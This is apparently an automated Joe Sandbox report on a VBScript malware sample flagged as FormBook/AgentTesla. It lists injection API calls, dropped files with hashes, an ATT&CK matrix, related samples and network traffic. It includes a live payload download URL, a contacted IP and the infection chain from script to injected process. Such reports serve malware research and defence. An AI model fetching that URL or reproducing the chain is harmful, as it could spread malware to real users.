Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Section loaded: NULL target: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	Section loaded: NULL target: C:\Windows\SysWOW64\verclsid.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe"	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

2_2_00403350

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.3341143444.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3341888509.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3335643246.00000000351A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3342290692.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3341485549.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3336400994.0000000037600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.3341143444.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3341888509.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3335643246.00000000351A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3342290692.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3341485549.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3336400994.0000000037600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Native API	221 Scripting	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	111 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	1 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	111 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	23 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Scan_20241030.vbs	11%	ReversingLabs	Text.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	100%	Avira	HEUR/AGEN.1337950
C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsx8568.tmp\System.dll	0%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kmsaksesuar.com	46.28.239.165	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://kmsaksesuar.com/CXvhXkzFIbqDQGDXBmPisHdik126.bin	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
46.28.239.165	kmsaksesuar.com	Turkey		42910	PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545146
Start date and time:	2024-10-30 07:31:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Scan_20241030.vbs
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@7/9@1/1
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 66% Number of executed functions: 28 Number of non-executed functions: 312
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Scan_20241030.vbs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
	nabm68k.elf	Get hash	malicious	Unknown	Browse	188.132.241.224
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	188.132.193.46
	DRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDF	Get hash	malicious	Unknown	Browse	78.135.79.21
	https://t.ly/k1aDE	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	78.135.79.21
	voicemai____Now_AUD__autoresponse(9.htm	Get hash	malicious	Phisher	Browse	188.132.193.30
	Swift E-Posta Bildirimi_2024-09-23_T11511900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.132.158.64
	Contact Form and Delivery Details.png.lnk	Get hash	malicious	Unknown	Browse	188.132.193.46
	e-dekont.html.exe	Get hash	malicious	AgentTesla	Browse	188.132.200.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	46.28.239.165
	AWB-M09CT560.docx.doc	Get hash	malicious	Unknown	Browse	46.28.239.165
	Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	46.28.239.165
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	46.28.239.165
	XhYAqi0wi5.exe	Get hash	malicious	Stealc	Browse	46.28.239.165
	Uviv7rEtnt.exe	Get hash	malicious	Stealc, Vidar	Browse	46.28.239.165
	PO 20240949.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.28.239.165
	PO 20240949.exe	Get hash	malicious	FormBook, GuLoader	Browse	46.28.239.165
	rTransferenciarealizada451236.exe	Get hash	malicious	GuLoader	Browse	46.28.239.165
	PO-10212024168877 PNG2023-W101.exe	Get hash	malicious	GuLoader	Browse	46.28.239.165

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsx8568.tmp\System.dll	rpedido-00035.exe	Get hash	malicious	FormBook, GuLoader	Browse
	rpedido-00035.exe	Get hash	malicious	GuLoader	Browse
	presupuesto urgente.exe	Get hash	malicious	FormBook, GuLoader	Browse
	presupuesto urgente.exe	Get hash	malicious	GuLoader	Browse
	PEDIDO-144797.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PEDIDO-144797.exe	Get hash	malicious	GuLoader	Browse
	rpedido-002297.exe	Get hash	malicious	FormBook, GuLoader	Browse
	rpedido-002297.exe	Get hash	malicious	GuLoader	Browse
	FACTURA-002297.exe	Get hash	malicious	FormBook, GuLoader	Browse
	FACTURA-002297.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsx8568.tmp\System.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.659384359264642
Encrypted:	false
SSDEEP:	192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
MD5:	8B3830B9DBF87F84DDD3B26645FED3A0
SHA1:	223BEF1F19E644A610A0877D01EADC9E28299509
SHA-256:	F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
SHA-512:	D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: rpedido-00035.exe, Detection: malicious, Browse Filename: rpedido-00035.exe, Detection: malicious, Browse Filename: presupuesto urgente.exe, Detection: malicious, Browse Filename: presupuesto urgente.exe, Detection: malicious, Browse Filename: PEDIDO-144797.exe, Detection: malicious, Browse Filename: PEDIDO-144797.exe, Detection: malicious, Browse Filename: rpedido-002297.exe, Detection: malicious, Browse Filename: rpedido-002297.exe, Detection: malicious, Browse Filename: FACTURA-002297.exe, Detection: malicious, Browse Filename: FACTURA-002297.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	768106
Entropy (8bit):	7.639472224642164
Encrypted:	false
SSDEEP:	12288:YWq1u4H7cGfj1ssGuLS7FDlwVSIKfozTJbvKG4Kq+PCMLXGU4y7:+3DfjCsGt7vqSR2KM3LWby
MD5:	BC4F5F5E028CFD0EFEC5D07EF47C15D7
SHA1:	1E3A5EC8DC0BF3D3A17B8CB2DEBAF7E25EF051DA
SHA-256:	F5AEBB018D2D79A1C3D14C16B9A1734E2FA62528F96B436AEA887D65B36DFFBF
SHA-512:	B7EE2920F5D8F51486025BED1348F48C8570310BF79DF0BA70D7186DAC6CACF39A79B68226E84C7E8C933E9EB2B4B932715D115C5A478B77D22AB6D0602B5978
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....uY.................d....:.....P3............@.......................... A...........@...........................................=.Xg...........................................................................................................text....c.......d.................. ..`.rdata...............h..............@..@.data...8.9..........\|..............@....ndata... ....:..........................rsrc...Xg....=..h..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\assureres\Indiciets237\Impersuadability\Bikses.Gre10

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
File Type:	data
Category:	dropped
Size (bytes):	310269
Entropy (8bit):	7.689227022607866
Encrypted:	false
SSDEEP:	6144:Ug4nXeMyN3xVLnG+HgIjV1X8z7b4+V324:qnhyN3XnG+7zXSPRlz
MD5:	82A4A524E0F8A7136C770748B95E3F90
SHA1:	FC1600B74FEADBB01D6A2EAA2E26044AEFBA70CB
SHA-256:	0CB472AD35BE3275DAEA7268B67C198198421FE02C71CC239010ABC07861B2E1
SHA-512:	2B988FE822EB64C6EADC47CC338B7F60F57EAC9C709E3F7DDD766DA5B9A938B20F185C07CAD3C59AC71B822AA44FA3D73DC22182AA31D2D8EA2F01CB1DF95F8F
Malicious:	false
Reputation:	low
Preview:	..G........................x.dd.ff.......C..\|\|.Q..........55.......III.........................p..........^.....q...@...........&&..............RR........6.A.CC.........KKK.........$.....LL.....FFF.............gg....."""......2............a...cc.......e.........44444.................................s......G.....444...._..........I.....".....................................NNN...777.....:......JJ.............8...................555.............kkk................+...................'....&..........EE...."".............UU...i....y..........!......xxxx....................m..........33............uuu...m.....//..................///////....--..P...................................:.&&&..4444.....]].ddd...~~~....IIII...........-............SSS..5...............................\|\|......<....,.......................====.777...hh.TT.WWW.....@@.555..................................jj..............ii..........>.{{{{....bb.b........dd........DDDDDD.QQQ.........*****..m...ddd.z..7..."""..............

C:\Users\user\assureres\Indiciets237\Impersuadability\Hudeopkber\og-image.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1200x1200, components 3
Category:	dropped
Size (bytes):	96294
Entropy (8bit):	7.178913530007052
Encrypted:	false
SSDEEP:	1536:v8WqRyeHWYQmVwkQs312QdYx1/mMsrPxEFLcAjFXk3fANfNCEw4JRI0u:vHfcpQmVrhesrPKF/J0vANoEw480u
MD5:	A486EDB9D999C22A10E57FC6FB43ECCA
SHA1:	927BBD3BD00352C47C3092D47203C969B5E8C885
SHA-256:	9E8755E9C20F1C77DB4C19AAF9C09C834645497A8DA757A6012AA972577F32D6
SHA-512:	1AB3958AEFCEC27F321A3FF817133A9CA5B1E0E9E56ADF46B3B74281AAEEAFD9685D72174DD0983BB466DE7CED38553D723DE0D5816A0D86D6855E58BC4BB880
Malicious:	false
Reputation:	low
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d........................................................................................................................................................................................................................................................!.".1#.v.8A2.7w.xQ..6VB$a3.W.RS.4.%&.q.r.DTU...........................!1..AQ"..aq....2BRr#.t6..b...$..5v7...3SsTu.8..C.4.c.%......U.V..D.............?...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\assureres\Indiciets237\Impersuadability\Hudeopkber\passifloraceae.fll

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
File Type:	data
Category:	dropped
Size (bytes):	81523
Entropy (8bit):	2.312830815709351
Encrypted:	false
SSDEEP:	768:Hsm578dsamuNZFw+GPLCZjpiVUOFG0vAMjpvXrnxnqmJzXxIdnIcSngAoE:us0N7bEjGshX1n1zBI2hoE
MD5:	66FBB90D20DA82AD00AAC1AE6644E068
SHA1:	644C0E6F6B0E996865C36A4D2DFC4E2754AB35C8
SHA-256:	A2A4516035A45FEDA01C48FC1C037D6A7F917C45F537E67B46332F305F97A242
SHA-512:	D6393DA7F6062DAF1EDF70A522EB7E6E5F1E9B8477EB379C470CD16420B8A1A14941CF27365FA7E1F048F0711E668ECE9EBAF12F8CD05E4E3E67DC1A8C1C5B6B
Malicious:	false
Reputation:	low
Preview:	p....4..`.................\..W........'.......................F...q..D............................}.O.....f.l...3.k...........V........2.................@..........9.........................."....^....D;.....B;............................................ij.................................J.....p.........<......._......................S./...........df.=.......\...........$.....T........].............r....................x..................................>E..........6................................T.......i...........5....m..........J.*....................Z.........F.......................H....C....J......................................a...D......................hh............................8..d.......3......D..... ......................................;..........................9...]....E...............................c....................k...;.0.......n.............y..............................2................................#.....................................................

C:\Users\user\assureres\Indiciets237\Impersuadability\Opgavehaandteringers.Ple

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
File Type:	data
Category:	dropped
Size (bytes):	86158
Entropy (8bit):	4.606318020008474
Encrypted:	false
SSDEEP:	1536:O6Z5Xl1jcfggl/hcnYIb6sgcub2EsQeH8L0oWX2M:t57gllpcnY6fuw35v
MD5:	DBBDCFB042AC189972A8D9FC5A2734E4
SHA1:	56F9592D8D5C906B60149C81BCF5DBD4FC3AAACA
SHA-256:	C463392DF962C6535BCFBBC898F14E2686C754D590BB4D87E28559229FE644DD
SHA-512:	915ABC54A89732D91448B51C039C883609E78462867037D63FCBED81A5AAB7C71E5C96227D71A28CA279909978881B964F4CC0AB4084C17D7F25143D924CD7A8
Malicious:	false
Reputation:	low
Preview:	..............................:.....v....??.....)..>....000.66........................cc.........9..............,,....... ..7.y......................@@@@@.nnnn...JJJJ......t..555.............\|.................?...................................e.......N............`.....OO..............t..g...........>......................C......a....................2.................W..q...:.GG........66666.................w.........<<<<..............JJJJ.~.888....///.rr......HH.aaa......s.......................nnn........................^.....................I..b...p.....M..................GGG..FFF..).......&...............s................JJ......(.......D................\|\|...A............+.......:...yy......................8....$............nn.................................yyyy...................t.... ........H........=.........................)).......-.........RR...yyy....TT...........JJJ.....................C........}.PP....I............................_...........22.S......**...............

C:\Users\user\assureres\Indiciets237\Impersuadability\Stvlekngte.uru

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
File Type:	data
Category:	dropped
Size (bytes):	163893
Entropy (8bit):	2.2877433740859536
Encrypted:	false
SSDEEP:	1536:f8u7IkXRKeZSxMOlkpYo1Q2ncZN00N5Y3pVE584ev:f73PZEco2ncZLY3k6pv
MD5:	4FF0F06FD5CC4B44A73730B6B88B8325
SHA1:	5A3FB26480F01AFEC911BF655E0CDBA750FA35C6
SHA-256:	F72D4616971C45111C41881F1E4C4A02737FCFB43CBADC1063D3AA10E7C0AB1E
SHA-512:	C79FAEE85FE416BC112E8506C6467FD2D73F1F565380BC25CB8E78CD56465D50CD4DAF1E5065515BAF91B2913FBCB6DEA595CB53E67416BCB3796DDA50FD2CAC
Malicious:	false
Preview:	......l....................................7........7..f........3...............:..........................................................................=..............~...........F.\|...........................~....f..............s......*_........................h..........................G..#..................I............L.....p.}.......................=...................;..I.......@........T..........................y.F..........&.........%.q1.............z.....................................N........................................C....N.....n............H.........................X..........D............Z..\|I..............M.......y............T.... .........L..%.......Y........................................g................Y....Q..........6.D....p............!.............'.......X.......^........................................-.....................................................z............]...U.....n................................!...........g......q..................

C:\Users\user\assureres\Indiciets237\Impersuadability\fonder.skr

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
File Type:	data
Category:	dropped
Size (bytes):	110442
Entropy (8bit):	2.3060780412906046
Encrypted:	false
SSDEEP:	768:Y6xuhcgjVv59a9WHrcrShD7kYe3693cZ8SrBIVEnum4n2s/R1T1HC0NUwiV+7/Pm:YFpZArmMy7j/p1JzNUhQDj5WXOKWrFs
MD5:	43505B65F7AEE37FC24ADDA62CCACEF6
SHA1:	F17D57382117BC33AD32F32DE96DE06028EE9F6A
SHA-256:	9CB43B4C08CC6226D6389197247CB9C7E94C7D05478A90A92FEB7EA2B58E6014
SHA-512:	2E9EF41021AECB34000D25D54B18C7472032061408A21D7242F0F76FA06DDF92CB2F0C63D15EB3314BA47E472425040D1C3F4E4C7012F57F93BCE41BFFA00759
Malicious:	false
Preview:	..a........+.....J...e.........!........G......g..................................<.h.0...o...a...................X......................>.1............x.....L.................................................v..................]........y............i............c...........-.....7.........<....................Z...............m._...........}...................U.E.V.........o.....x..S........Z..............-.,.....=..C.................................................y.............Q.......................................J...................^.......U.....6......7.................................I....l........Q...dJ.........S......&...!....................iR..i........................Q....%....................................8..q.:.....S...........M.................Z..........................................e.............t.....'..`.........K..........................A............`..........................................L......................................_.....u......0................

C:\Users\user\assureres\Indiciets237\Impersuadability\mutchkins.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
File Type:	ASCII text, with very long lines (346), with no line terminators
Category:	dropped
Size (bytes):	346
Entropy (8bit):	4.196416850462699
Encrypted:	false
SSDEEP:	6:V1FzY0kQvfQjQKoMgPwNgQeByoW+grDHGyY/JFmuYf0sg6QAG:V1F80kkfvKnjNgQFoHgiJUjf0shk
MD5:	9D94BDDDC13FB5292A14BA9AD0FC094A
SHA1:	0611ECCFDF8621009D36086088EE17D723FE1D8A
SHA-256:	596538840C26693C58C0B29D4E87D5F7B8772AFDA83496EDDB0338453FBCF3F4
SHA-512:	D780CFF53A5A59E04CD609D3D0399F1AD1DC5BDEDC323DEF6A54E3E6F0A2740E9A72A5C185186C02EF7AC32F4668E3C14EE2D8CEDAFB9984A8DCB0D32AF0E9CB
Malicious:	false
Preview:	optaktsudsendelsens vinbjergsnegl linden,legevrket meridienne fortiende grdis trafikal belemrer tapperhedsmedalje,tholeiitic antimasonry vivisekerer milieuvrnenes aflsse genfdt.henhre blodpletter datareferencerne labiomental videopladespilleres polios.farvervej klukkene brainward,heterologies carlo elaphomycetaceae concretism semisphere dikket,

Static File Info

General

File type:	ASCII text, with very long lines (65041), with CRLF line terminators
Entropy (8bit):	5.552106031562016
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	Scan_20241030.vbs
File size:	1'223'010 bytes
MD5:	52585e0274d1bc59e4213fcccc6baac1
SHA1:	621dd580660931e40378627578028cc8f3c787e3
SHA256:	7ca53cc839a436c88b58f7472c6b117e92a84269481b56b720b580d6ffaaa0c5
SHA512:	b0351625c10677c23a0ccf6cb8469e7124691582c8f8b02a67911b9e7122757e9da6246b2e6d89e4e075405e185aadf115a84cacab1a34f8cde6952d439ced30
SSDEEP:	24576:FlBpcHWqHmW3dPuNyRGITc07v4XFn55J4ikOsZ:jqGJNWPWoiMZ
TLSH:	CE45D073AF61BB1C3F24E1E8448F5B197DD58CEF01A4EAE8D27D320A1D82E81152F569
File Content Preview:	Option Explicit....' Configuration Constants..Const SYSTEM_TEMP_FOLDER = 2..Const INITIAL_DELAY_MIN_MS = 3000..Const INITIAL_DELAY_MAX_MS = 7000..Const EXECUTION_DELAY_MIN_MS = 2000..Const EXECUTION_DELAY_MAX_MS = 5000....' Configuration Variables (set at

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-30T07:34:12.151928+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49976	46.28.239.165	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 07:34:10.767899990 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:10.767967939 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:10.768840075 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:10.780266047 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:10.780303955 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:11.753168106 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:11.753349066 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:11.823582888 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:11.823647022 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:11.824103117 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:11.824177027 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:11.829473972 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:11.871402025 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.152003050 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.152101040 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.152229071 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.152287006 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.152323961 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.152406931 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.238104105 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.238210917 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.306130886 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.306232929 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.423083067 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.423227072 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.423834085 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.423938990 CET	49976	443	192.168.2.5	46.28.239.165
